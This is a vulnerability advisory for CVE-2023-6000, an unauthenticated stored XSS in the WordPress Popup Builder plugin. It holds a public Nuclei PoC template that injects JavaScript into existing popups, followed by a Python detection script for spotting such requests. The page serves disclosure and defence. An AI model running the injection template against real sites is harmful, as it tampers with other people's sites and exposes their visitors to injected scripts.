CVE-2023-6000: WordPress Popup Builder <= 4.2.3 - Unauthenticated Stored XSS

Date: 2025-08-01 | Affected software: WordPress Popup Builder | PoC: public

Vulnerability description

The Popup Builder WordPress plugin before 4.2.3 does not prevent simple visitors from updating existing popups, and injecting raw JavaScript in them, which could lead to Stored XSS attacks.

PoC code [public]

id: CVE-2023-6000

info:
  name: WordPress Popup Builder <= 4.2.3 - Unauthenticated Stored XSS
  author: riteshs4hu
  severity: medium
  description: |
    The Popup Builder WordPress plugin before 4.2.3 does not prevent simple visitors from updating existing popups, and injecting raw JavaScript in them, which could lead to Stored XSS attacks.
  remediation: Fixed in 4.2.3
  reference:
    - https://wordpress.org/plugins/popup-builder/
    - https://nvd.nist.gov/vuln/detail/cve-2023-6000
    - https://wpscan.com/vulnerability/cdb3a8bd-4ee0-4ce0-9029-0490273bcfc8/
    - https://github.com/rxerium/CVE-2023-6000
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-6000
    cwe-id: CWE-79
    epss-score: 0.59338
    epss-percentile: 0.98184
    cpe: cpe:2.3:a:sygnoos:popup_builder:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sygnoos
    product: popup_builder
    framework: wordpress
    fofa-query: body="/wp-content/plugins/popup-builder"
    publicwww-query: "/wp-content/plugins/popup-builder/"
  tags: cve,cve2023,wordpress,wp-plugin,wp,wpscan,xss,stored,intrusive,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: popup_id
        group: 1
        regex:
          - 'sgpb-main-popup-data-container-([0-9]+)'
        internal: true

  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        sgpb-is-preview=1&post_ID={{popup_id}}&sgpb-type=html&sgpb-WillOpen=alert('document.domain');

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, 'alert(\'document.domain\')', 'popup-builder')
          - contains(content_type, "text/html")
          - status_code == 200
        condition: and
# digest: 490a00463044022053e4f9516589c5d687658aa0112bcf9846771dea5cf553f930659e9ed1aeaf0c02200229ce7f21ac141f23b128382eb45465d20a2ace52a2e643398aed5701664afd:922c64590222798bb761d5b6d8e72950
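
Detection example (added here, not part of the template or the plugin's code): a defender-side check that flags HTTP requests with the same shape as the template's second request, so proxy or WAF captures can be reviewed for popup updates sent by visitors. The parameter names come from the template; the cookie heuristic, the severity labels, the host name and the sample requests are assumptions constructed for illustration.

```python
from urllib.parse import parse_qs

# Parameter names below come from the template's second request.
PREVIEW_FLAG, POPUP_ID, PLUGIN_PREFIX = "sgpb-is-preview", "post_ID", "sgpb-"
CONTROL_FIELDS = {PREVIEW_FLAG, "sgpb-type"}

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0].split(" ", 1)[0].upper(), headers, body.strip()

def flag_popup_update(raw):
    """Return a finding dict when a request has the template's shape, else None."""
    method, headers, body = parse_request(raw)
    ctype = headers.get("content-type", "").lower()
    if method != "POST" or not ctype.startswith("application/x-www-form-urlencoded"):
        return None
    form = parse_qs(body, keep_blank_values=True)
    if form.get(PREVIEW_FLAG) != ["1"] or POPUP_ID not in form:
        return None
    # Remaining sgpb-* fields are the popup settings the request tries to set
    # (assumption based on the template's sgpb-WillOpen field).
    fields = sorted(k for k in form if k.startswith(PLUGIN_PREFIX) and k not in CONTROL_FIELDS)
    if not fields:
        return None
    # Heuristic (assumption): a wordpress_logged_in_* cookie marks a logged-in user;
    # the cookie's validity is not checked here.
    logged_in = "wordpress_logged_in_" in headers.get("cookie", "")
    return {"popup_id": form[POPUP_ID][0], "fields": fields,
            "authenticated": logged_in, "severity": "info" if logged_in else "high"}

# Constructed sample requests (not captured traffic).
BODY = "sgpb-is-preview=1&post_ID=42&sgpb-type=html&sgpb-WillOpen=console.log(1);"
HEAD = "POST / HTTP/1.1\r\nHost: blog.example.test\r\nContent-Type: application/x-www-form-urlencoded\r\n"
SAMPLE_VISITOR = HEAD + "\r\n" + BODY
SAMPLE_LOGGED_IN = HEAD + "Cookie: wordpress_logged_in_0000=constructed\r\n\r\n" + BODY
SAMPLE_UNRELATED = "POST /wp-login.php HTTP/1.1\r\nHost: blog.example.test\r\n\r\nlog=a&pwd=b"

if __name__ == "__main__":
    for sample in (SAMPLE_VISITOR, SAMPLE_LOGGED_IN, SAMPLE_UNRELATED):
        print(flag_popup_update(sample))
```

A "high" finding on a site still running a vulnerable plugin version is a reason to inspect the stored settings of the popup named in `popup_id` and to upgrade to the fixed release listed under remediation.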